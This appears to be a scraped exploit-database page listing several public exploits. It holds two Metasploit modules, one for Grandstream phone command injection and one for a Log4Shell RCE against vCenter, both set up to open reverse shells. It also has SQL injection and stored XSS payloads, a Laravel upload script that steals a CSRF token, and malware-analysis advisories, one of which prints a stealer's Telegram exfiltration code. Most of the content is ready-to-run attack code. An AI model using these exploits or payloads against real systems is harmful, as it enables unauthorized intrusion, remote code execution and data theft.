Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager HttpFingerprint = { pattern: [ /Multimedia Phone/ ] }.freeze def initialize(info = {}) super( update_info( info, 'Name' => "Grandstream GXV3175 'settimezone' Unauthenticated Command Execution", 'Description' => %q{ This module exploits a command injection vulnerability in Grandstream GXV3175 IP multimedia phones. The 'settimezone' action does not validate input in the 'timezone' parameter allowing injection of arbitrary commands. A buffer overflow in the 'phonecookie' cookie parsing allows authentication to be bypassed by providing an alphanumeric cookie 93 characters in length. This module was tested successfully on Grandstream GXV3175v2 hardware revision V2.6A with firmware version 1.0.1.19. }, 'Author' => [ 'alhazred', # Command injection vulnerability discovery and exploit 'Brendan Scarvell', # Auth bypass discovery 'bcoles' # Metasploit ], 'License' => MSF_LICENSE, 'Platform' => 'linux', 'References' => [ [ 'CVE', '2019-10655' ], [ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920' ], [ 'URL', 'https://github.com/dirtyfilthy/gxv3175-remote-code-exec/blob/master/modules/exploits/linux/http/grandstream_gxv3175_cmd_exec.rb' ] ], 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] }, 'DisclosureDate' => '2016-09-01', 'Privileged' => true, 'Arch' => ARCH_ARMLE, 'DefaultOptions' => { 'PrependFork' => true, 'MeterpreterTryToFork' => true, 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp', 'CMDSTAGER::FLAVOR' => 'wget' }, 'CmdStagerFlavor' => %w[wget], 'Targets' => [ ['Automatic', {}] ], 'DefaultTarget' => 0 ) ) end def check res = send_request_cgi( 'uri' => '/manager', 'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"", 'vars_get' => { 'action' => 'settimezone', 'timezone' => '' } ) if res && res.code == 200 && res.body.to_s.include?('Response=Success') return CheckCode::Detected('phonecookie authentication bypassed successfully.') end CheckCode::Safe end def execute_command(cmd, _opts) res = send_request_cgi( 'uri' => '/manager', 'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"", 'vars_get' => { 'action' => 'settimezone', 'timezone' => "`#{cmd}`" } ) unless res fail_with(Failure::Unreachable, 'Connection failed') end unless res.code == 200 fail_with(Failure::UnexpectedReply, "Unexpected reply (HTTP #{res.code})") end unless res.body.to_s.include?('Response=Success') fail_with(Failure::UnexpectedReply, "Unexpected reply (#{res.body.length} bytes)") end end def exploit execute_cmdstager( linemax: 220, # 255 minus URL encoding background: true ) end end </code></pre>

<pre><code># Exploit Title: Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated) # Google Dork: intitle: "Inicio de Sesión - Kmaleon" # Date: 2021-11-05 # Exploit Author: Amel BOUZIANE-LEBLOND # Vendor Homepage: https://www.levelprograms.com # Software Link: https://www.levelprograms.com/kmaleon-abogados/ # Version: v1.1.0.205 # Tested on: Linux # Description: # The Kmaleon application from levelprogram is vulnerable to # SQL injection via the 'tipocomb' parameter on the kmaleonW.php ==================== 1. SQLi ==================== http://127.0.0.1/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=[SQLI]&isgroup=true The 'tipocomb' parameter is vulnerable to SQL injection. GET parameter 'tipocomb' is vulnerable. --- Parameter: #1* (URI) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=-9144 OR 6836=6836&isgroup=true Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 8426 FROM(SELECT COUNT(*),CONCAT(0x7176716b71,(SELECT (ELT(8426=8426,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&isgroup=true Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 2738 FROM (SELECT(SLEEP(5)))EYSv)&isgroup=true --- [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.0 </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::JndiInjection include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::CheckModule prepend Msf::Exploit::Remote::AutoCheck def initialize(_info = {}) super( 'Name' => 'VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)', 'Description' => %q{ VMware vCenter Server is affected by the Log4Shell vulnerability whereby a JNDI string can sent to the server that will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the root user in the case of the Linux virtual appliance and SYSTEM on Windows. This module will start an LDAP server that the target will need to connect to. This exploit uses the logon page vector. }, 'Author' => [ 'Spencer McIntyre', # this exploit module and JNDI/LDAP lib stuff 'RageLtMan <rageltman[at]sempervictus>', # JNDI/LDAP lib stuff 'jbaines-r7', # vCenter research 'w3bd3vil' # vCenter PoC https://twitter.com/w3bd3vil/status/1469814463414951937 ], 'References' => [ [ 'CVE', '2021-44228' ], [ 'URL', 'https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis'], [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0028.html' ], [ 'URL', 'https://twitter.com/w3bd3vil/status/1469814463414951937' ] ], 'DisclosureDate' => '2021-12-09', 'License' => MSF_LICENSE, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'SRVPORT' => 389, 'WfsDelay' => 30, 'CheckModule' => 'auxiliary/scanner/http/log4shell_scanner' }, 'Targets' => [ [ 'Windows', { 'Platform' => 'win' }, ], [ 'Linux', { 'Platform' => 'unix', 'Arch' => [ARCH_CMD], 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } }, ] ], 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [IOC_IN_LOGS], 'AKA' => ['Log4Shell', 'LogJam'], 'Reliability' => [REPEATABLE_SESSION], 'RelatedModules' => [ 'auxiliary/scanner/http/log4shell_scanner', 'exploit/multi/http/log4shell_header_injection' ] } ) register_options([ OptString.new('TARGETURI', [ true, 'Base path', '/']) ]) end def check validate_configuration! return Exploit::CheckCode::Unknown if tenant.nil? super end def check_options { 'LDAP_TIMEOUT' => datastore['WfsDelay'], 'HTTP_HEADER' => 'X-Forwarded-For', 'TARGETURI' => normalize_uri(target_uri, 'websso', 'SAML2', 'SSO', tenant) + '?SAMLRequest=', 'HEADERS_FILE' => nil, 'URIS_FILE' => nil } end def build_ldap_search_response_payload return [] if @search_received @search_received = true print_good('Delivering the serialized Java object to execute the payload...') build_ldap_search_response_payload_inline('BeanFactory') end def tenant return @tenant unless @tenant.nil? res = send_request_cgi('uri' => normalize_uri(target_uri, 'ui', 'login')) return nil unless res&.code == 302 return nil unless res.headers['Location'] =~ %r{websso/SAML2/SSO/([^/]+)\?} @tenant = Regexp.last_match(1) end def trigger @search_received = false # HTTP request initiator send_request_cgi( 'uri' => normalize_uri(target_uri, 'websso', 'SAML2', 'SSO', tenant) + '?SAMLRequest=', 'headers' => { 'X-Forwarded-For' => jndi_string } ) end def exploit validate_configuration! start_service trigger sleep(datastore['WfsDelay']) handler ensure cleanup end end </code></pre>

<pre><code># Exploit Title: WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS) # Date: 20/08/2021 # Exploit Author: Davide Taraschi # Vendor Homepage: https://wpschoolpress.com/ # Software Link: https://wpschoolpress.com/free-download/ # Version: up to 2.1.17 (non included) # Tested on: Ubuntu 20.04 over WordPress 5.8 and apache2 # CVE : CVE-2021-24664 # Description: The plugin sanitise some fields using a wordpress built-in function called sanitize_text_field() but does not correctly escape them before outputting in attributes, resulting in Stored Cross-Site Scripting issues. The function wp_sanitize_text_field() escape < and > but does not escape characters like ", allowing an attacker to break a HTML input tag and inject arbitrary javascript. # PoC: As admin, - Add a new teacher attendance (/wp-admin/admin.php?page=sch-teacherattendance), Tick the Absent box and put the following payload in the Reason: "style=animation-name:rotation onanimationstart=alert(/XSS/)// The XSS will be triggered when adding another teacher attendance by clicking on the Add button - Add a new Student Attendance (/wp-admin/admin.php?page=sch-attendance), tick the Absent box and put the following payload in the Reason: " style=animation-name:rotation onanimationstart=alert(/XSS/)// The XSS will be triggered when adding another attendance by clicking the 'Add/Update' button - Add a new Subject Mark Field (/wp-admin/admin.php?page=sch-settings&sc=subField) and put the following payload in the 'Field': " autofocus onfocus=alert(/XSS/)// The XSS will be triggered when editing the created Subject Mark (ie /admin.php?page=sch-settings&sc=subField&ac=edit&sid=3) - Create a new Subject (/wp-admin/admin.php?page=sch-subject), with the following payload in the Subject Name field: " autofocus onfocus=alert(/XSS/)// The XSS will be triggered when editing the Subject - Create a new Exam (/wp-admin/admin.php?page=sch-exams) with the following payload in the Exam Name Field: " autofocus onfocus=alert(/XSS/)// The XSS will be triggered when editing the Exam=20 Note that some of this XSS issues can be executed by a teacher (medium-privileged user), but since wordpress uses HTTPonly cookies is impossible to steal cookies. </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/5dfa998f62612e10d5d28d26948dd50f.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Ransomware Builder Babuk Vulnerability: Insecure Permissions Description: The malware creates directorys with insecure permissions when write to c:\ drive, granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. Type: PE32 MD5: 5dfa998f62612e10d5d28d26948dd50f Vuln ID: MVID-2022-0461 Disclosure: 01/19/2022 Exploit/PoC: C:\>builder.exe Usage: builder.exe FolderName C:\>builder.exe c:\hate Creating folder 'c:\hate' curve25519 keys generated. "c:\hate\e_win.exe" written! "c:\hate\d_win.exe" written! "c:\hate\e_esxi.out" written! "c:\hate\d_esxi.out" written! "c:\hate\e_nas_x86.out" written! "c:\hate\d_nas_x86.out" written! "c:\hate\e_nas_arm.out" written! "c:\hate\d_nas_arm.out" written! "c:\hate\kp.curve25519" written! "c:\hate\ks.curve25519" written! Press any key to continue . . . C:\>cacls \hate C:\hate BUILTIN\Administrators:(OI)(CI)(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F BUILTIN\Users:(OI)(CI)(ID)R NT AUTHORITY\Authenticated Users:(ID)C NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre style="position: relative;"> <code># Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF) # Date: 14/11/2021 # Exploit Author: Hosein Vita # Vendor Homepage: https://laravel.com/ # Software Link: https://laravel.com/docs/4.2 # Version: Laravel Framework 8.70.1 # Tested on: Windows/Linux # Description: We can bypass laravel image file upload functionality to upload arbitary files on the web server # which let us run arbitary javascript and bypass the csrf token , For more information read this one https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b # Steps to reproduce: 1- Use HxD tool and add FF D8 FF E0 at the very begining of your file 2- Use code below to bypass csrf token ÿØÿà<html> <head> <title>Laravel Csrf Bypass</title> </head> <body> <script> function submitFormWithTokenJS(token) { var xhr = new XMLHttpRequest(); xhr.open("POST", POST_URL, true); // Send the proper header information along with the request xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); // This is for debugging and can be removed xhr.onreadystatechange = function() { if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) { console.log(xhr.responseText); } } // xhr.send("_token=" + token + "&desiredParameter=desiredValue"); } function getTokenJS() { var xhr = new XMLHttpRequest(); // This tels it to return it as a HTML document xhr.responseType = "document"; // true on the end of here makes the call asynchronous //Edit the path as you want xhr.open("GET", "/image-upload", true); xhr.onload = function (e) { if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) { // Get the document from the response page = xhr.response // Get the input element input = page.getElementsByTagName("input")[0]; // Show the token alert("The token is: " + input.value); // Use the token to submit the form submitFormWithTokenJS(input.value); } }; // Make the request xhr.send(null); } getTokenJS(); var POST_URL="/" getTokenJS(); </script> </html> 3- Save it as Html file and upload it. </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/54530f88c8e4f4371c9418f00c256b1d_B.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: CollectorStealerBuilder v2.0.0 Panel Vulnerability: Man-in-the-Middle (MITM) Description: MITM vector exists as the CURL request used when sending data to "api.telegram.org/bot" has CURLOPT_SSL_VERIFYPEER set to false. CURLOPT_SSL_VERIFYPEER checks if remote certificate is valid and that you trust was issued by a CA you trust and it's genuine. Type: WebUI MD5: 54530f88c8e4f4371c9418f00c256b1d MD5: 8c003105229554557c75ec836b4fcf79 (collect.php) Vuln ID: MVID-2022-0459 Disclosure: 01/19/2022 Exploit/PoC: Vulnerable "collect.php" code snippet. $desc = "_________________________ \r\n\n🏴 IP: " . $ip . "\n🌐 Country: " . $country . "\n🏠 City: " . $city . "\n🔧 Build: ". $Build[1] . "\r\n_________________________ \n\n" . $desc; // Добавляем айпи и город $url = "https://api.telegram.org/bot" . $token . "/sendDocument"; $document = new CURLFile(realpath($dest_path)); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, ["chat_id" => $chat_id, "document" => $document, "caption" => $desc]); curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type:multipart/form-data"]); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $out = curl_exec($ch); curl_close($ch); Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>